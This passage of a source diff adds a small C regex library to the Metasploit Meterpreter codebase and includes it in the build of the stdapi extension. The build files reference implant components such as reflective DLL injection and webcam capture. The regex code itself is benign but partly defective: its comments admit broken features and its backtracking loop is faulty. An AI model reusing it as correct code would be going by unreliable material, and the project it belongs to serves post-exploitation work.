*matchlength = prelen;
return 0;
}
static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength)
{
const char* prepoint = text;
while ((text_offset < text_length) && matchone(p, text[text_offset]))
{
text_offset++;
(*matchlength)++;
}
while (text > prepoint)
{
if (matchpattern(pattern, text, text_length, text_offset--, matchlength))
return 1;
(*matchlength)--;
}
return 0;
}
static int matchquestion(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength)
{
if (p.type == UNUSED)
return 1;
if (matchpattern(pattern, text, text_length, text_offset, matchlength))
return 1;
if ((text_offset < text_length) && matchone(p, text[text_offset++]))
{
if (matchpattern(pattern, text, text_length, text_offset, matchlength))
{
(*matchlength)++;
return 1;
}
}
return 0;
}
#if 0
/* Recursive matching */
static int matchpattern(regex_t* pattern, const char* text, int *matchlength)
{
int pre = *matchlength;
if ((pattern[0].type == UNUSED) || (pattern[1].type == QUESTIONMARK))
{
return matchquestion(pattern[1], &pattern[2], text, matchlength);
}
else if (pattern[1].type == STAR)
{
return matchstar(pattern[0], &pattern[2], text, matchlength);
}
else if (pattern[1].type == PLUS)
{
return matchplus(pattern[0], &pattern[2], text, matchlength);
}
else if ((pattern[0].type == END) && pattern[1].type == UNUSED)
{
return text[0] == '\0';
}
else if ((text[0] != '\0') && matchone(pattern[0], text[0]))
{
(*matchlength)++;
return matchpattern(&pattern[1], text+1);
}
else
{
*matchlength = pre;
return 0;
}
}
#else
/* Iterative matching */
static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength)
{
size_t pre = *matchlength;
do
{
if ((pattern[0].type == UNUSED) || (pattern[1].type == QUESTIONMARK))
{
return matchquestion(pattern[0], &pattern[2], text, text_length, text_offset, matchlength);
}
else if (pattern[1].type == STAR)
{
return matchstar(pattern[0], &pattern[2], text, text_length, text_offset, matchlength);
}
else if (pattern[1].type == PLUS)
{
return matchplus(pattern[0], &pattern[2], text, text_length, text_offset, matchlength);
}
else if ((pattern[0].type == END) && pattern[1].type == UNUSED)
{
return (text_offset == text_length - 1);
}
/* Branching is not working properly
else if (pattern[1].type == BRANCH)
{
return (matchpattern(pattern, text) || matchpattern(&pattern[2], text));
}
*/
(*matchlength)++;
}
while ((text_offset < text_length) && matchone(*pattern++, text[text_offset++]));
*matchlength = pre;
return 0;
}
#endif

75
c/meterpreter/source/tiny-regex-c/re.h Normal file

@ -0,0 +1,75 @@
/*
*
* Mini regex-module inspired by Rob Pike's regex code described in:
*
* http://www.cs.princeton.edu/courses/archive/spr09/cos333/beautiful.html
*
*
*
* Supports:
* ---------
* '.' Dot, matches any character
* '^' Start anchor, matches beginning of string
* '$' End anchor, matches end of string
* '*' Asterisk, match zero or more (greedy)
* '+' Plus, match one or more (greedy)
* '?' Question, match zero or one (non-greedy)
* '[abc]' Character class, match if one of {'a', 'b', 'c'}
* '[^abc]' Inverted class, match if NOT one of {'a', 'b', 'c'} -- NOTE: feature is currently broken!
* '[a-zA-Z]' Character ranges, the character set of the ranges { a-z | A-Z }
* '\s' Whitespace, \t \f \r \n \v and spaces
* '\S' Non-whitespace
* '\w' Alphanumeric, [a-zA-Z0-9_]
* '\W' Non-alphanumeric
* '\d' Digits, [0-9]
* '\D' Non-digits
*
*
*/
#ifndef _TINY_REGEX_C
#define _TINY_REGEX_C
#ifndef RE_DOT_MATCHES_NEWLINE
/* Define to 0 if you DON'T want '.' to match '\r' + '\n' */
#define RE_DOT_MATCHES_NEWLINE 1
#endif
#ifdef __cplusplus
extern "C"{
#endif
// size_t for 32-bit compilation.
#include <stddef.h>
typedef struct regex_t
{
unsigned char type; /* CHAR, STAR, etc. */
union
{
unsigned char ch; /* the character itself */
unsigned char* ccl; /* OR a pointer to characters in class */
} u;
} regex_t;
/* Typedef'd pointer to get abstract datatype. */
typedef struct regex_t* re_t;
/* Compile regex string pattern to a regex_t-array. */
re_t re_compile(const char* pattern, size_t pattern_length);
/* Find matches of the compiled pattern inside text. */
int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchlength);
/* Find matches of the txt pattern inside text (will compile automatically first). */
int re_match(const char* pattern, size_t pattern_length, const char* text, size_t text_length, size_t* matchlength);
#ifdef __cplusplus
}
#endif
#endif /* ifndef _TINY_REGEX_C */

2
c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt

@ -22,6 +22,7 @@ include_directories(../../source/common)
include_directories(../../source/jpeg-8)
include_directories(../../source/ReflectiveDLLInjection/common)
include_directories(../../source/extensions/stdapi/server)
include_directories(../../source/tiny-regex-c)
set(SRC_DIR ../../source/extensions/stdapi)
file(GLOB_RECURSE SRC_FILES
@ -29,6 +30,7 @@ file(GLOB_RECURSE SRC_FILES
${SRC_DIR}/*.cpp
${SRC_DIR}/*.rc
${MOD_DEF_DIR}/extension.def
../../source/tiny-regex-c/*.c
)
list(REMOVE_ITEM SRC_FILES ${CMAKE_CURRENT_SOURCE_DIR}/${SRC_DIR}/server/resource/hook.c)

2
c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj

@ -559,6 +559,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClCompile Include="..\..\source\extensions\stdapi\server\webcam\bmp2jpeg.c" />
<ClCompile Include="..\..\source\extensions\stdapi\server\webcam\webcam.cpp" />
<ClCompile Include="..\..\source\logging\logging.c" />
<ClCompile Include="..\..\source\tiny-regex-c\re.c" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="..\..\source\extensions\stdapi\server\resource\stdapi.rc" />
@ -587,6 +588,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClInclude Include="..\..\source\extensions\stdapi\server\fs\fs.h" />
<ClInclude Include="..\..\source\extensions\stdapi\server\fs\fs_local.h" />
<ClInclude Include="..\..\source\extensions\stdapi\server\fs\search.h" />
<ClInclude Include="..\..\source\tiny-regex-c\re.h" />
</ItemGroup>
<ItemGroup>
<None Include="..\..\source\extensions\stdapi\server\resource\hook.dll" />